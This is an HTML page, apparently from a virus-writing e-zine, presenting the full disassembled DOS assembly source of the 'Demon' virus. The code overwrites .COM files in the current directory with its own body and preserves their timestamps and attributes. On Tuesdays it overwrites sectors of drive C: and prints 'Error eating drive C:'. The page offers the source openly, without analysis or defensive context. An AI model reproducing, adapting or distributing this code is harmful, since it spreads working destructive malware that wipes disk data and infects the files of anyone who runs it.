<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ThE NeW OrDeR #2</title>
</head>

<body bgcolor="#000000" link="#0000FF" vlink="#000080"
bgproperties="fixed" topmargin="15" leftmargin="20" "
vlink="#000080">

<p align="center"><img src="../Images/viruz.gif" width="560"
height="100"></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../images/Rs.jpg" width="640" height="12"></strong></font></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../Images/fogskul.gif" alt="OneHalf  Virii" width="160"
height="100"></strong></font></p>

<p align="center"><font color="#FF0000" size="6"><strong>DEMON</strong></font></p>

<p align="left"><font color="#00FFFF"><strong>;
--------------------------------------------------------------------------<br>
; Disassembled by FairWind / NRG , nrgteam@mail.ru<br>
;
--------------------------------------------------------------------------</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>Tuesday = 2<br>
<br>
Search_Rec struc<br>
db 21 dup (?)<br>
FileAttr db ?<br>
FileTime dw ?<br>
FileDate dw ?<br>
FileSize dd ?<br>
FileName db 13 dup (?)<br>
Search_Rec ends<br>
<br>
Virus segment<br>
assume cs:Virus,ds:Virus,es:Virus,ss:Virus<br>
<br>
org 0080h<br>
DTA Search_Rec &lt;&gt;<br>
<br>
org 0100h<br>
Demon:<br>
Virus_Size = Virus_End - Demon<br>
<br>
mov dx,offset All_COM<br>
mov ah,4eh<br>
mov cx,110bh<br>
int 21h<br>
nop<br>
jnc Infect<br>
jmp short Check_Day<br>
Infect: call Replicate<br>
mov dx,offset DTA<br>
mov ah,4fh <br>
int 21h<br>
nop<br>
jnc Next_File<br>
jmp short Check_Day<br>
Next_File: jmp Infect<br>
Check_Day: mov ah,2ah<br>
int 21h<br>
cmp al,Tuesday<br>
je Thrash_Drive<br>
mov ah,4ch<br>
int 21h<br>
<br>
Thrash_Drive: mov Counter,0<br>
jmp Write_Sectors<br>
Write_Sectors: mov al,Drive_C<br>
mov cx,160<br>
mov dx,0<br>
mov bx,0<br>
int 26h<br>
inc Counter<br>
cmp Counter,10<br>
je Show_Msg<br>
jne Write_Sectors<br>
Show_Msg: mov ah,09h<br>
mov dx,offset Virus_Msg<br>
int 21h<br>
mov ah,4ch<br>
int 21h<br>
<br>
Replicate: mov dx,offset DTA.FileName<br>
mov ax,4300h<br>
int 21h<br>
mov COM_Attr,cx<br>
nop<br>
xor cx,cx<br>
mov ax,4301h<br>
int 21h<br>
nop<br>
mov ax,3d02h<br>
int 21h<br>
nop<br>
jc Check_Day<br>
mov bx,ax<br>
mov ax,5700h<br>
int 21h<br>
nop<br>
mov COM_Time,cx<br>
mov COM_Date,dx<br>
mov dx,offset Demon<br>
mov ah,40h<br>
mov cx,Virus_Size<br>
int 21h<br>
nop<br>
mov ax,5701h<br>
mov dx,COM_Date<br>
mov cx,COM_Time<br>
int 21h<br>
mov ah,3eh<br>
int 21h<br>
nop<br>
mov dx,offset DTA.FileName<br>
mov cx,COM_Attr<br>
mov ax,4301h<br>
int 21h<br>
retn<br>
<br>
All_COM db '*.COM',0<br>
COM_Date dw 0<br>
COM_Time dw 0<br>
COM_Attr dw 0<br>
Counter db 0<br>
Drive_C db 2<br>
dw 0<br>
Copyright db 'Demonhyak Viri X.X (c) by Cracker Jack 1991 (IVRL)'<br>
dw 0<br>
Virus_Msg db 10,13,'Error eating drive C:',10,13,'$'<br>
<br>
Virus_End label byte<br>
<br>
Virus ends<br>
end Demon</strong></font></p>

<p align="center"><a href="../TNO#2_start.htm"><img
src="../images/14ic3.gif" border="0" width="60" height="65"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../images/coollogo_com_7565375.jpg" border="0" width="206"
height="53"></a></p>
</body>
</html>
